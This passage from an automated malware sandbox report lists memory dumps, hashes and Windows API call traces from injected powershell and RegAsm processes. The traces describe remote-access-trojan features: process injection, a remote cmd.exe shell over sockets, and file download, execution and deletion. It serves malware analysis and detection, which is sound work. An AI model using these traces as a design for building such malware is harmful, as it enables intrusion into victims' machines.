                                  • Snapshot File: hcaresult_13_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID: N_H
                                  • API String ID: 963392458-343878021

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2808794988.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2808794988.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2808794988.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2815299199.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2815299199.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2815299199.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Execution Graph

                                  Execution Coverage:6.6%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:12
                                  Total number of Limit Nodes:0

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2882325337.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2888794194.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: M_H
                                  • API String ID: 0-3997733227

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2882325337.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2882325337.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2882325337.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2888794194.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: hz4
                                  • API String ID: 0-2199005916

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2888794194.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2888794194.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2888794194.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: adf6156a1757fdbe03f8053fad0a84864e23d572ab950dbeb27b169e191dceb6
                                  • Instruction ID: 24dd7a881a790956024661312e3b49d86da2687ae0657dd2148220cece33145a
                                  • Opcode Fuzzy Hash: adf6156a1757fdbe03f8053fad0a84864e23d572ab950dbeb27b169e191dceb6
                                  • Instruction Fuzzy Hash: 0911D813F1EF6A0BF3F95E5C18B51F866C2DF96A21F4A06BAD64DE21C2DC0CAC512191

                                  Execution Graph

                                  Execution Coverage:1.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:4.6%
                                  Total number of Nodes:519
                                  Total number of Limit Nodes:9

                                  Control-flow Graph

                                  APIs
                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                  • API String ID: 4236061018-3687161714
                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
                                  • TerminateProcess.KERNEL32(00000000), ref: 0044337D
                                  • ExitProcess.KERNEL32 ref: 0044338F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID: PkGNG
                                  • API String ID: 1703294689-263838557
                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88

                                  Control-flow Graph

                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                  • SetEvent.KERNEL32(?), ref: 00404E43
                                  • CloseHandle.KERNEL32(?), ref: 00404E4C
                                  • closesocket.WS2_32(?), ref: 00404E5A
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                  • SetEvent.KERNEL32(?), ref: 00404EA2
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                  • SetEvent.KERNEL32(?), ref: 00404EBA
                                  • CloseHandle.KERNEL32(?), ref: 00404EBF
                                  • CloseHandle.KERNEL32(?), ref: 00404EC4
                                  • SetEvent.KERNEL32(?), ref: 00404ED1
                                  • CloseHandle.KERNEL32(?), ref: 00404ED6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                  • String ID: PkGNG
                                  • API String ID: 3658366068-263838557
                                  • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                  • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                  Control-flow Graph (graph image not reproduced; basic blocks 4485e6-448660, calling LoadLibraryExW, GetLastError and FreeLibrary)
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                  • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID:
                                  • API String ID: 3177248105-0
                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC

                                  Control-flow Graph (graph image not reproduced; basic block 40d0a4-40d0d0, calling 401fab, CreateMutexA and GetLastError)
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateErrorLastMutex
                                  • String ID: SG
                                  • API String ID: 1925916568-3189917014
                                  • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                  • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                  • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                  • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519

                                  Control-flow Graph (graph image not reproduced; basic blocks 44854a-4485e5, calling 4485e6, GetProcAddress and 434591)
                                  APIs
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc__crt_fast_encode_pointer
                                  • String ID:
                                  • API String ID: 2279764990-0
                                  • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                  • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                  • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                  • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9

                                  Control-flow Graph (graph image not reproduced; basic blocks 450154-4501cd, calling 445b74, 448b04 and 446802)
                                  APIs
                                    • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                  • _free.LIBCMT ref: 004501C0
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap_free
                                  • String ID:
                                  • API String ID: 614378929-0
                                  • Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                  • Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
                                  • Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                  • Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779

                                  Control-flow Graph (graph image not reproduced; basic blocks 445b74-445bd0, calling RtlAllocateHeap, 4455c6, 443001 and 44062d)
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                  • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                  • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                  • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                  APIs
                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                  • API String ID: 1067849700-181434739
                                  • Opcode ID: f676259c62b52cfccf94f92d8d960cb361a95eefcbcfe61b4d852a774d262317
                                  • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                  • Opcode Fuzzy Hash: f676259c62b52cfccf94f92d8d960cb361a95eefcbcfe61b4d852a774d262317
                                  • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                  • CloseHandle.KERNEL32 ref: 00405A23
                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                  • CloseHandle.KERNEL32 ref: 00405A45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                  • API String ID: 2994406822-18413064
                                  • Opcode ID: 263f862d2a4e5ab39b8f277b163e5cfdff8eedff8f4ffa8a5c5ab1abbd34aa3f
                                  • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                  • Opcode Fuzzy Hash: 263f862d2a4e5ab39b8f277b163e5cfdff8eedff8f4ffa8a5c5ab1abbd34aa3f
                                  • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                    • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
